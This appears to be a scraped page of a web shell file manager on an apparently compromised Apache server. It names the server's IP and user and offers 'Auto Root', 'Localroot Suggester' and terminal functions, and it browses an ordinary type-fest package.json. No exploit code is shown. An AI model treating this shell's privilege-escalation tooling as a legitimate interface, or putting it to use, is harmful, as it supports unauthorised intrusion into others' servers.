Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
type-fest /
Delete
Unzip
Name
Size
Permission
Date
Action
source
[ DIR ]
drwxr-xr-x
2023-12-23 20:12
index.d.ts
1.55
KB
-rw-r--r--
2020-10-13 21:44
package.json
782
B
-rw-r--r--
2020-10-13 21:44
Save
Rename
{ "name": "type-fest", "version": "0.18.0", "description": "A collection of essential TypeScript types", "license": "(MIT OR CC0-1.0)", "repository": "sindresorhus/type-fest", "funding": "https://github.com/sponsors/sindresorhus", "author": { "name": "Sindre Sorhus", "email": "sindresorhus@gmail.com", "url": "https://sindresorhus.com" }, "engines": { "node": ">=10" }, "scripts": { "test": "xo && tsd" }, "files": [ "index.d.ts", "source" ], "keywords": [ "typescript", "ts", "types", "utility", "util", "utilities", "omit", "merge", "json" ], "devDependencies": { "tsd": "^0.13.1", "xo": "^0.28.2" }, "types": "index.d.ts", "xo": { "rules": { "@typescript-eslint/indent": "off", "func-call-spacing": "off" } } }